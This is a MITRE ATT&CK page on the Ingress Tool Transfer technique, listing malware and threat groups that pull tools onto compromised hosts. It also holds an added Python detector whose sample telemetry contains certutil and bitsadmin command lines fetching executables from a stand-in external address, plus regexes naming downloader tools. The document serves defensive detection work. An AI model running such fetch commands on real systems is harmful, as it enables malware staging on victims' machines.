Currently viewing ATT&CK v8.2 which was live between October 27, 2020 and April 28, 2021.

Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

ID: T1105
Sub-techniques: No sub-techniques
Tactic: Command And Control
Platforms: Linux, Windows, macOS
Permissions Required: User
Data Sources: File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Version: 2.0
Created: 31 May 2017
Last Modified: 20 March 2020

Procedure Examples

Name Description
ABK

ABK has the ability to download files from C2.[1]

Agent Tesla

Agent Tesla can download additional files for execution on the victim’s machine.[2][3]

Agent.btz

Agent.btz attempts to download an encrypted binary from a specified domain.[4]

Anchor

Anchor can download additional payloads.[5][6]

APT-C-36

APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.[7]

APT18

APT18 can upload a file to the victim’s machine.[8]

APT28

APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.[9][10][11]

APT3

APT3 has a tool that can copy files to remote machines.[12]

APT32

APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.[13]

APT33

APT33 has downloaded additional files and programs from its C2 server.[14][15]

APT37

APT37 has downloaded second stage malware from compromised websites.[16][17]

APT38

APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.[18]

APT39

APT39 has downloaded tools to compromised hosts.[19]

APT41

APT41 used certutil to download additional files.[20]

Aria-body

Aria-body has the ability to download additional payloads from C2.[21]

Astaroth

Astaroth uses certutil and BITSAdmin to download additional malware.[22][23]

Attor

Attor can download additional plugins, updates and other files.[24]

AuditCred

AuditCred can download files and additional malware.[25]

Avenger

Avenger has the ability to download files from C2 to a compromised host.[1]

Azorult

Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes.[26][27]

BabyShark

BabyShark has downloaded additional files from the C2.[28]

BackConfig

BackConfig can download and execute additional payloads on a compromised host.[29]

BADNEWS

BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.[30][31][32]

BadPatch

BadPatch can download and execute or update malware.[33]

Bankshot

Bankshot uploads files and secondary payloads to the victim's machine.[34]

BBK

BBK has the ability to download files from C2 to the infected host.[1]

BISCUIT

BISCUIT has a command to download a file from the C2 server.[35]

Bisonal

Bisonal has the capability to download files to execute on the victim’s machine.[36]

BITSAdmin

BITSAdmin can be used to create BITS Jobs to upload and/or download files.[37]

Bonadan

Bonadan can download additional modules from the C2 server.[38]

BONDUPDATER

BONDUPDATER can download or upload files from its C2 server.[39]

Briba

Briba downloads files onto infected hosts.[40]

BRONZE BUTLER

BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget).[41]

build_downer

build_downer has the ability to download files from C2 to the infected host.[1]

Bundlore

Bundlore can download and execute new versions of itself.[42]

Calisto

Calisto has the capability to upload and download files to the victim's machine.[43]

CallMe

CallMe has the capability to download a file to the victim from the C2 server.[44]

Cannon

Cannon can download a payload for execution.[45]

Carberp

Carberp can download and execute new plugins from the C2 server.[46][47]

Cardinal RAT

Cardinal RAT can download and execute additional payloads.[48]

CARROTBALL

CARROTBALL has the ability to download and install a remote payload.[49]

CARROTBAT

CARROTBAT has the ability to download and execute a remote file via certutil.[50]

certutil

certutil can be used to download files from a given URL.[51][52]

ChChes

ChChes is capable of downloading files, including additional modules.[53][54][55]

Chimera

Chimera has remotely copied tools and malware onto targeted systems.[56]

China Chopper

China Chopper's server component can download remote files.[57][58][59]

CHOPSTICK

CHOPSTICK is capable of performing remote file transmission.[60]

CloudDuke

CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.[61]

cmd

cmd can be used to copy files to/from a remotely connected external system.[62]

Cobalt Group

Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.[63][64] The group's JavaScript backdoor is also capable of downloading files.[65]

CoinTicker

CoinTicker executes a Python script to download its second stage.[66]

CookieMiner

CookieMiner can download additional scripts from a web server.[67]

CORESHELL

CORESHELL downloads another dropper from its C2 server.[68]

Crimson

Crimson contains a command to retrieve files from its C2 server.[69]

Cryptoistic

Cryptoistic has the ability to send and receive files.[70]

Dacls

Dacls can download its payload from a C2 server.[70][71]

DarkComet

DarkComet can load any files onto the infected machine to execute.[72][73]

Daserf

Daserf can download remote files.[74][41]

DDKONG

DDKONG downloads and uploads files on the victim’s machine.[75]

Denis

Denis deploys additional backdoors and hacking tools to the system.[76]

Dipsind

Dipsind can download remote files.[77]

DOGCALL

DOGCALL can download and execute additional payloads.[78]

down_new

down_new has the ability to download files to the compromised host.[1]

Downdelph

After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.[79]

Dragonfly 2.0

Dragonfly 2.0 copied and installed tools for operations once in the victim environment.[80][81]

Drovorub

Drovorub can download files to a compromised host.[82]

Dyre

Dyre has a command to download and execute additional files.[83]

Elderwood

The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.[84]

Elise

Elise can download additional files from the C2 server for execution.[85]

Emissary

Emissary has the capability to download files from the C2 server.[86]

Empire

Empire can upload and download to and from a victim machine.[87]

esentutl

esentutl can be used to copy files to/from a given URL.[88]

EvilBunny

EvilBunny has downloaded additional Lua scripts from the C2.[89]

Exaramel for Linux

Exaramel for Linux has a command to download a file from a remote server.[90]

Felismus

Felismus can download files from remote servers.[91]

FELIXROOT

FELIXROOT downloads and uploads files to and from the victim’s machine.[92][93]

FIN7

FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.[94][95]

FIN8

FIN8 has used remote code execution to download subsequent payloads.[96]

Frankenstein

Frankenstein has uploaded and downloaded files to utilize additional plugins.[97]

Gamaredon Group

Tools used by Gamaredon Group are capable of downloading and executing additional payloads.[98][99][100]

Gazer

Gazer can execute a task to download a file.[101][102]

gh0st RAT

gh0st RAT can download files to the victim’s machine.[103][104]

Gold Dragon

Gold Dragon can download additional components from the C2 server.[105]

GoldenSpy

GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.[106]

Gorgon Group

Gorgon Group malware can download additional files from C2 servers.[107]

GreyEnergy

GreyEnergy can download additional modules and payloads.[93]

H1N1

H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.[108]

Hancitor

Hancitor has the ability to download additional files from C2.[109]

HAPPYWORK

HAPPYWORK can download and execute a second-stage payload.[16]

Helminth

Helminth can download additional files.[110]

Hi-Zor

Hi-Zor has the ability to upload and download files from its C2 server.[111]

HiddenWasp

HiddenWasp downloads a tar compressed archive from a download server to the system.[112]

HOPLIGHT

HOPLIGHT has the ability to connect to a remote host in order to upload and download files.[113]

HotCroissant

HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine.[114]

HTTPBrowser

HTTPBrowser is capable of writing a file to the compromised system from the C2 server.[115]

Hydraq

Hydraq creates a backdoor through which remote attackers can download files and additional malware components.[116][117]

HyperBro

HyperBro has the ability to download additional files.[118]

IcedID

IcedID has the ability to download additional modules and a configuration file from C2.[119][120]

InvisiMole

InvisiMole can upload files to the victim's machine for operations.[121][122]

Ixeshe

Ixeshe can download and execute additional files.[123]

JHUHUGIT

JHUHUGIT can retrieve an additional payload from its C2 server.[124][125] JHUHUGIT has a command to download files to the victim’s machine.[126]

JPIN

JPIN can download files and upgrade itself.[77]

jRAT

jRAT can download and execute files.[127][128][129]

KARAE

KARAE can upload and download files, including second-stage malware.[16]

Kasidet

Kasidet has the ability to download and execute additional files.[130]

Kazuar

Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.[131]

Kessel

Kessel can download additional modules from the C2 server.[38]

KeyBoy

KeyBoy has a download and upload functionality.[132][133]

KEYMARBLE

KEYMARBLE can upload files to the victim’s machine and can download additional payloads.[134]

Kivars

Kivars has the ability to download and execute files.[135]

Koadic

Koadic can download additional files.[136]

KONNI

KONNI can download files and execute them on the victim’s machine.[137]

Kwampirs

Kwampirs downloads additional files from C2 servers.[138]

Lazarus Group

Several Lazarus Group malware families are capable of downloading and executing binaries from its C2 server.[139][140][141][70][71]

Leviathan

Leviathan has downloaded additional scripts and files from adversary-controlled servers.[142][57]

LightNeuron

LightNeuron has the ability to download and execute additional files.[143]

Linfo

Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.[144]

LoudMiner

LoudMiner used SCP to update the miner from the C2.[145]

LOWBALL

LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.[146]

Machete

Machete can download additional files for execution on the victim’s machine.[147]

Magic Hound

Magic Hound has downloaded additional code and files from servers onto victims.[148] Magic Hound used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.[149]

MCMD

MCMD can upload additional files to a compromised host.[150]

MechaFlounder

MechaFlounder has the ability to upload and download files to and from a compromised host.[151]

menuPass

menuPass has installed updates and new malware on victims.[152][153]

Metamorfo

Metamorfo has used MSI to download files for execution.[154][155][156]

Micropsia

Micropsia can download and execute an executable from the C2 server.[157][158]

MiniDuke

MiniDuke can download additional encrypted backdoors onto the victim via GIF files.[159][160]

Misdat

Misdat is capable of downloading files from the C2.[161]

Mivast

Mivast has the capability to download and execute .exe files.[162]

MobileOrder

MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.[44]

Molerats

Molerats used executables to download malicious files from different sources.[163]

More_eggs

More_eggs can download and launch additional payloads.[164][165]

Mosquito

Mosquito can upload and download files to the victim.[166]

MuddyWater

MuddyWater has used malware that can upload additional files to the victim’s machine.[167][168][169]

NanHaiShu

NanHaiShu can download additional files from URLs.[142]

NanoCore

NanoCore has the capability to download and activate additional modules for execution.[170][171]

NavRAT

NavRAT can download files remotely.[172]

NDiskMonitor

NDiskMonitor can download and execute a file from a given URL.[32]

Nerex

Nerex creates a backdoor through which remote attackers can download files onto a compromised host.[84]

Netwalker

Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.[173]

Nidiran

Nidiran can download and execute files.[174]

njRAT

njRAT can download files to the victim’s machine.[175][176]

NOKKI

NOKKI has downloaded a remote module for execution.[177]

Octopus

Octopus can upload and download files to and from the victim’s machine.[178]

OilRig

OilRig can download remote files onto victims.[179]

Okrum

Okrum has built-in commands for uploading, downloading, and executing files to the system.[180]

OopsIE

OopsIE can download files from its C2 server to the victim's machine.[181][182]

Orz

Orz can download files onto the victim.[142]

OSX_OCEANLOTUS.D

OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine.[183]

Pasam

Pasam creates a backdoor through which remote attackers can upload files.[184]

Patchwork

Patchwork payloads download additional files from the C2 server.[185][32]

PipeMon

PipeMon can install additional modules via C2 commands.[186]

Pisloader

Pisloader has a command to upload a file to the victim machine.[187]

PLAINTEE

PLAINTEE has downloaded and executed additional plugins.[75]

PLATINUM

PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.[188]

PLEAD

PLEAD has the ability to upload and download files to and from an infected host.[189]

PlugX

PlugX has a module to download and execute files on the compromised machine.[190]

PoetRAT

PoetRAT has the ability to copy files, and to download and upload files over its command and control (C2) channel using FTP.[191]

PoisonIvy

PoisonIvy creates a backdoor through which remote attackers can upload files.[192]

PolyglotDuke

PolyglotDuke can retrieve payloads from the C2 server.[160]

Pony

Pony can download additional files onto the infected system.[193]

POSHSPY

POSHSPY downloads and executes additional PowerShell code and Windows binaries.[194]

PowerDuke

PowerDuke has a command to download a file.[195]

POWERSOURCE

POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.[196]

POWERSTATS

POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.[197]

POWRUNER

POWRUNER can download or upload files from its C2 server.[179]

Psylo

Psylo has a command to download a file to the system from its C2 server.[44]

Pteranodon

Pteranodon can download and execute additional files.[98]

PUNCHBUGGY

PUNCHBUGGY can download additional files and payloads to compromised hosts.[198][199]

Pupy

Pupy can upload and download to/from a victim machine.[200]

QuasarRAT

QuasarRAT can download files to the victim’s machine and execute them.[201][202]

Rancor

Rancor has downloaded additional malware, including by using certutil.[75]

RARSTONE

RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory.[203]

RATANKBA

RATANKBA uploads and downloads information.[204][205]

RDAT

RDAT can download files via DNS.[206]

RedLeaves

RedLeaves is capable of downloading a file from a specified URL.[207]

RegDuke

RegDuke can download files from C2.[160]

Remcos

Remcos can upload and download files to and from the victim’s machine.[208]

RemoteCMD

RemoteCMD copies a file over to the remote system before execution.[209]

Remsec

Remsec contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.[210][211]

Revenge RAT

Revenge RAT has the ability to upload and download files.[212]

REvil

REvil can download a copy of itself from an attacker controlled IP address to the victim machine.[213][214][215]

RGDoor

RGDoor uploads and downloads files to and from the victim’s machine.[216]

Rocke

Rocke used malware to download additional malicious files to the target system.[217]

RogueRobin

RogueRobin can save a new file to the system from the C2 server.[218][219]

ROKRAT

ROKRAT retrieves additional malicious payloads from the C2 server.[220][221]

RTM

RTM can download additional files.[222][223]

Sakula

Sakula has the capability to download files.[224]

Sandworm Team

Sandworm Team's Python backdoor can push additional malicious tools to an infected system.[225]

SDBot

SDBot has the ability to download a DLL from C2 to a compromised host.[226]

SeaDuke

SeaDuke is capable of uploading and downloading files.[227]

Seasalt

Seasalt has a command to download additional files.[35]

SEASHARPEE

SEASHARPEE can download remote files onto victims.[228]

ServHelper

ServHelper may download additional files to execute.[229][230]

Shamoon

Shamoon can download an executable to run on the victim.[231]

Sharpshooter

Sharpshooter downloaded additional payloads after a target was infected with a first-stage downloader.[232]

SHARPSTATS

SHARPSTATS has the ability to upload and download files.[233]

ShimRat

ShimRat can download additional files.[234]

ShimRatReporter

ShimRatReporter had the ability to download additional payloads.[234]

SHUTTERSPEED

SHUTTERSPEED can download and execute an arbitrary executable.[16]

Silence

Silence has downloaded additional modules and malware to victim’s machines.[235]

Skidmap

Skidmap has the ability to download files on an infected host.[236]

SLOWDRIFT

SLOWDRIFT downloads additional payloads.[16]

Smoke Loader

Smoke Loader downloads a new version of itself once it has installed. It also downloads additional plugins.[237]

Soft Cell

Soft Cell dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.[238]

SoreFang

SoreFang can download additional payloads from C2.[239][240]

SpeakUp

SpeakUp downloads and executes additional files from a remote server.[241]

SQLRat

SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.[242]

StoneDrill

StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victim's machine.[243]

StrongPity

StrongPity can download files to specified targets.[244]

Sunburst

Sunburst delivered different payloads, including Teardrop in at least one instance.[245]

TA505

TA505 has downloaded additional malware to execute on victim systems.[246][230][247]

TDTESS

TDTESS has a command to download and execute an additional file.[248]

Threat Group-3390

After re-establishing access to a victim network, Threat Group-3390 actors download tools including gsecdump and WCE that are staged temporarily on websites that were previously compromised but never used.[115]

TrickBot

TrickBot downloads several additional files and saves them to the victim's machine.[249]

Trojan.Karagany

Trojan.Karagany can upload, download, and execute files on the victim.[250][251]

Tropic Trooper

Tropic Trooper has used a delivered trojan to download additional files.[252]

TSCookie

TSCookie has the ability to upload and download files to and from the infected host.[253]

Turla

Turla has used shellcode to download Meterpreter after compromising a victim.[254]

TURNEDUP

TURNEDUP is capable of downloading additional files.[255]

TYPEFRAME

TYPEFRAME can upload and download files to the victim’s machine.[256]

UBoatRAT

UBoatRAT can upload and download files to the victim’s machine.[257]

UNC2452

UNC2452 downloaded additional tools, such as Teardrop malware and Cobalt Strike, to the compromised host following initial compromise.[245]

Unknown Logger

Unknown Logger is capable of downloading remote files.[30]

UPPERCUT

UPPERCUT can download and upload files to and from the victim’s machine.[258]

Ursnif

Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.[259][260]

Valak

Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.[261][262]

Vasport

Vasport can download files.[263]

VBShower

VBShower has the ability to download VBS files to the target computer.[264]

VERMIN

VERMIN can download and upload files to the victim's machine.[265]

Volgmer

Volgmer can download remote files and additional payloads to the victim's machine.[266][267][268]

WEBC2

WEBC2 can download and execute a file.[269]

WellMail

WellMail can receive data and executable scripts from C2.[270]

WellMess

WellMess can write files to a compromised host.[271][272]

Whitefly

Whitefly has the ability to download additional tools from the C2.[273]

Wiarp

Wiarp creates a backdoor through which remote attackers can download files.[274]

Winnti for Linux

Winnti for Linux has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and SOCKS5 proxying on the infected host.[275]

WIRTE

WIRTE has downloaded PowerShell code from the C2 server to be executed.[276]

Xbash

Xbash can download additional malicious files from its C2 server.[277]

YAHOYAH

YAHOYAH uses HTTP GET requests to download other files that are executed in memory.[278]

Zebrocy

Zebrocy obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.[279][45][280][11]

ZeroT

ZeroT can download additional payloads onto the victim.[281]

Zeus Panda

Zeus Panda can download additional malware plug-in modules and execute them on the victim’s machine.[282]

ZLib

ZLib has the ability to download files.[161]

ZxShell

ZxShell has a command to transfer files from a remote host.[283]

Mitigations

Mitigation Description
Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[284]

Detection

Monitor for file creation and for files transferred into the network. Unusual processes with external network connections that create files on-system may be suspicious. Use of utilities that does not normally occur on a given host is also suspicious: FTP, the living-off-the-land downloaders that recur in the procedure examples above (certutil, BITSAdmin, esentutl), and the native scp, rsync and sftp tools on macOS and Linux. Process command-line parameters are the data source that separates these from legitimate administration: a download utility invoked with a URL, UNC path or remote host it has not been seen with before is the event to alert on, not the mere presence of the binary.

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). For this technique the inverse is the more direct indicator: a host pulling a large volume of data from an external server it has not previously contacted. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[284]
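The three signals the Detection section lists, and the network-signature idea from the Network Intrusion Prevention mitigation, worked into runnable detection logic. This is an added example, not code from the ATT&CK page or any vendor product: the log formats, regexes, thresholds and sample records are assumptions constructed for the example, and the certutil (CryptoAPI) and BITS user-agent prefixes are the documented defaults with the version suffix left unmatched.

```python
"""Added example, not code from the ATT&CK page or any vendor: detection
logic for the Ingress Tool Transfer signals listed under Detection (download
utilities on the command line, network-signature hits such as the user-agents
certutil and BITS send, and uncommon inbound data flows). Log formats,
regexes, thresholds and sample records are assumptions constructed here."""
import re
from collections import defaultdict

# 1. Command-line signals. Living-off-the-land downloaders from the procedure
#    examples (certutil, BITSAdmin, esentutl) and the native copy tools from
#    the technique description (scp, rsync, sftp) plus curl/wget. A pattern
#    only fires when a remote source (URL, UNC path or user@host:path) is
#    present, so a purely local esentutl or certutil invocation stays quiet.
REMOTE_SRC = r"(?:(?:https?|ftp)://\S+|\\\\\S+|\S+@\S+:\S*)"
DOWNLOADER_PATTERNS = {
    "certutil_urlcache":    re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*" + REMOTE_SRC, re.I),
    "bitsadmin_transfer":   re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*" + REMOTE_SRC, re.I),
    "esentutl_remote_copy": re.compile(r"\besentutl(?:\.exe)?\b.*/y\s+" + REMOTE_SRC, re.I),
    "powershell_download":  re.compile(r"\b(?:Invoke-WebRequest|Start-BitsTransfer|DownloadFile|DownloadString)\b.*" + REMOTE_SRC, re.I),
    "unix_copy_tool":       re.compile(r"^(?:\S*/)?(?:scp|rsync|sftp|curl|wget)\b.*" + REMOTE_SRC, re.I),
}

def classify_cmdline(cmdline):
    """Names of the downloader patterns a process command line matches."""
    return [name for name, rx in DOWNLOADER_PATTERNS.items() if rx.search(cmdline)]

# 2. Network-signature signals. certutil's URL fetch goes through CryptoAPI and
#    BITS has its own HTTP client; both send distinctive user-agents (known
#    prefixes; the version suffix varies, so only the prefix is matched).
UA_SIGNATURES = {
    "certutil_cryptoapi_ua": re.compile(r"^Microsoft-CryptoAPI/"),
    "bits_ua":               re.compile(r"^Microsoft BITS/"),
}

def parse_proxy_line(line):
    """Parse one constructed tab-separated proxy record:
    src_host <TAB> dst_host <TAB> bytes_in <TAB> bytes_out <TAB> user_agent"""
    src, dst, b_in, b_out, ua = line.rstrip("\n").split("\t")
    return {"src": src, "dst": dst, "bytes_in": int(b_in),
            "bytes_out": int(b_out), "ua": ua}

def signature_hits(record):
    return [name for name, rx in UA_SIGNATURES.items() if rx.search(record["ua"])]

# 3. Uncommon data flows. Sum bytes per (src, dst) and flag a large transfer
#    where inbound dwarfs outbound from a destination absent from the host's
#    baseline. For ingress the tell-tale ratio is inbound >> outbound, the
#    reverse of the exfiltration case the Detection text uses as its example.
def uncommon_inbound_flows(records, baseline, min_bytes=500_000, ratio=10.0):
    totals = defaultdict(lambda: [0, 0])
    for r in records:
        totals[(r["src"], r["dst"])][0] += r["bytes_in"]
        totals[(r["src"], r["dst"])][1] += r["bytes_out"]
    flagged = []
    for (src, dst), (b_in, b_out) in totals.items():
        if dst in baseline.get(src, set()):
            continue                      # known-good destination for this host
        if b_in >= min_bytes and b_in >= ratio * max(b_out, 1):
            flagged.append((src, dst, b_in, b_out))
    return flagged

def triage(process_events, proxy_log, baseline):
    """Combine the three signals into (kind, host, detail, object) alerts."""
    alerts = []
    for host, _user, cmd in process_events:
        for name in classify_cmdline(cmd):
            alerts.append(("cmdline", host, name, cmd))
    records = [parse_proxy_line(l) for l in proxy_log.splitlines() if l]
    for r in records:
        for name in signature_hits(r):
            if r["dst"] not in baseline.get(r["src"], set()):
                alerts.append(("signature", r["src"], name, r["dst"]))
    for src, dst, b_in, b_out in uncommon_inbound_flows(records, baseline):
        alerts.append(("flow", src, f"{b_in}B in / {b_out}B out", dst))
    return alerts

# Constructed sample telemetry (hosts, addresses and paths are invented).
PROCESS_EVENTS = [  # (host, user, command line)
    ("WS01", "alice", r"certutil.exe -urlcache -split -f http://198.51.100.7/up.dat C:\Users\alice\AppData\Local\Temp\up.dat"),
    ("WS01", "alice", r"bitsadmin.exe /transfer job1 /download /priority high http://198.51.100.7/a.exe C:\Windows\Temp\a.exe"),
    ("SRV02", "svc_backup", r"esentutl.exe /y C:\Windows\Temp\x.dat /d C:\Users\Public\x.dat /o"),
    ("BUILD1", "jenkins", "scp deploy@build.example.internal:/releases/app.tar.gz /opt/app/"),
    ("WS01", "alice", r"notepad.exe C:\Users\alice\notes.txt"),
]
PROXY_LOG = (
    "WS01\t198.51.100.7\t2400000\t1100\tMicrosoft-CryptoAPI/10.0\n"
    "WS01\t198.51.100.7\t1800000\t900\tMicrosoft BITS/7.8\n"
    "WS01\tupdates.example.internal\t52000000\t4000\tMicrosoft BITS/7.8\n"
    "SRV02\tapi.example.internal\t4100\t3900\tpython-requests/2.25.1\n"
)
BASELINE = {"WS01": {"updates.example.internal"}, "SRV02": {"api.example.internal"}}

if __name__ == "__main__":
    for alert in triage(PROCESS_EVENTS, PROXY_LOG, BASELINE):
        print(alert)
```

Running the sample yields six alerts: three command-line hits (certutil and BITSAdmin fetching from an external address on WS01, and the scp pull on the build host, which is the kind of legitimate-but-unusual use a per-host allowlist would later tune out), two user-agent signature hits for the same external address, and one flow alert for WS01 receiving about 4 MB from that address while sending almost nothing. The local esentutl copy and the BITS traffic to the baselined update server stay quiet, which is the point of gating on a remote source and a per-host baseline rather than on the binary name alone.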

References

  1. Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.
  2. Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.
  3. The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.
  4. Shevchenko, S. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.
  5. Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.
  6. Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020.
  7. QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.
  8. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.
  9. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
  10. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
  11. Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
  12. Chen, X., Scott, M., Caselden, D. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
  13. Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
  14. Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved April 10, 2019.
  15. Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.
  16. FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.
  17. GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.
  18. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
  19. Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020.
  20. Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
  21. CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.
  22. Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.
  23. Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.
  24. Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.
  25. Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.
  26. Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.
  27. Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.
  28. Lim, M. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat. Retrieved October 7, 2019.
  29. Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.
  30. Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
  31. Levene, B. et al. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
  32. Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
  33. Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.
  34. US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.
  35. Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.
  36. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
  37. Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.
  38. Dumont, R., M.Léveillé, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.
  39. Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.
  40. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
  41. Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
  42. Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.
  43. Pantig, J. (2018, July 30). OSX.Calisto. Retrieved September 7, 2018.
  44. Falcone, R. and Miller-Osborn, J. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
